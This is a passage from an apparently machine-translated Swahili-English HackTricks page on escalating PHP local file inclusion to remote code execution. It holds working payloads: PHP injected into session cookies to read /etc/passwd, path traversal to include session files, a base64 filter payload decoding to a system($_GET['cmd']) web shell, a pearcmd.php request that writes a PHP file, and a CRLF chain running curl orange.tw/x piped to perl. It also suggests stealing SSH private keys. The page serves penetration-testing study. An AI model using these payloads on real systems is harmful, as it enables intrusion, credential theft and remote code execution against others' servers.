Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

Katika PHP, sessions hizi huhifadhiwa katika /var/lib/php5/sess\[PHPSESSID]_ faili

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

Weka cookie kuwa <?php system('cat /etc/passwd');?>

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

Tumia LFI kujumuisha faili ya session ya PHP

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2

Kupitia ssh

Ikiwa ssh inafanya kazi, angalia ni mtumiaji gani anatumika (/proc/self/status & /etc/passwd) na jaribu kupata <HOME>/.ssh/id_rsa

Kupitia vsftpd logs

The logs for the FTP server vsftpd are located at /var/log/vsftpd.log. Katika tukio ambapo kuna Local File Inclusion (LFI) vulnerability, na kufikiwa kwa seva ya vsftpd iliyofunuliwa kunwezekana, hatua zifuatazo zinaweza kuzingatiwa:

1. Sindika payload ya PHP kwenye shamba la username wakati wa mchakato wa kuingia.
2. Baada ya injection, tumia LFI kupata logs za seva kutoka /var/log/vsftpd.log.

Kupitia php base64 filter (using base64)

As shown in this article, PHP base64 filter inapuuzia tu Non-base64. Unaweza kutumia hilo kupita ukaguzi wa extension ya file: ikiwa utatoa base64 inayomalizika na “.php”, itapuuzia “.” na kuongeza “php” kwenye base64. Hapa kuna mfano wa payload:

http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Via php filters (hakuna faili inahitajika)

This writeup inaeleza kwamba unaweza kutumia php filters to generate arbitrary content kama output. Hii kwa msingi ina maana kwamba unaweza generate arbitrary php code kwa ajili ya include without needing to write ndani ya faili.

LFI2RCE via PHP Filters

Via segmentation fault

Upload faili itakayohifadhiwa kama temporary katika /tmp, kisha katika same request, chochea segmentation fault, na kisha the temporary file won’t be deleted hivyo unaweza kuitafuta.

LFI2RCE via Segmentation Fault

Via Nginx temp file storage

Ikiwa umepata Local File Inclusion na Nginx inaendesha mbele ya PHP unaweza kupata RCE kwa mbinu ifuatayo:

LFI2RCE via Nginx temp files

Via PHP_SESSION_UPLOAD_PROGRESS

Ikiwa umepata Local File Inclusion hata kama don’t have a session na session.auto_start iko Off. Ikiwa utatoa PHP_SESSION_UPLOAD_PROGRESS katika data ya multipart POST, PHP itaku enable the session for you. Unaweza kutumia hili vibaya kupata RCE:

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

Via temp file uploads in Windows

Ikiwa umepata Local File Inclusion na server inaendesha kwenye Windows unaweza kupata RCE:

LFI2RCE Via temp file uploads

Via pearcmd.php + URL args

Kama explained in this post, script /usr/local/lib/phppearcmd.php ipo kwa default katika php docker images. Zaidi ya hayo, inawezekana kupitisha arguments kwenye script kupitia URL kwa sababu inataja kwamba ikiwa param ya URL haina =, inapaswa kutumika kama argument. Angalia pia watchTowr’s write-up na Orange Tsai’s “Confusion Attacks”.

The following request create a file in /tmp/hello.php with the content <?=phpinfo()?>:

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1

Ifuatayo inatumia CRLF vuln ili kupata RCE (kutoka here):

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

Via phpinfo() (file_uploads = on)

Ikiwa umepata Local File Inclusion na faili inayofichua phpinfo() yenye file_uploads = on unaweza kupata RCE:

LFI2RCE via phpinfo()

Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

Ikiwa umepata Local File Inclusion na unaweza exfiltrate the path ya faili ya temp LAKINI server inafanyia checking kama file to be included has PHP marks, unaweza kujaribu bypass that check kwa kutumia hii Race Condition:

LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

Via eternal waiting + bruteforce

Ikiwa unaweza kudanganya LFI ili upload temporary files na kufanya server ihang utekelezaji wa PHP, unaweza kisha brute force filenames during hours kupata faili ya muda:

LFI2RCE via Eternal waiting

To Fatal Error

Ikiwa unajumuisha yoyote ya faili /usr/bin/phar, /usr/bin/phar7, /usr/bin/phar.phar7, /usr/bin/phar.phar. (Unahitaji kujumuisha ile ile mara 2 ili kusababisha kosa hilo).

Sijui hili linavyoweza kuwa muhimu lakini linaweza kuwa.
Hata kama utasababisha PHP Fatal Error, PHP temporary files zilizopakuliwa huondolewa.

Marejeleo

• PayloadsAllTheThings

• PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders

• Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)

• Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5

• watchTowr – We need to talk about PHP (pearcmd.php gadget)

• Orange Tsai – Confusion Attacks on Apache

• VTENEXT 25.02 – a three-way path to RCE

• The Art of PHP: CTF‑born exploits and techniques

• When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise

• Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.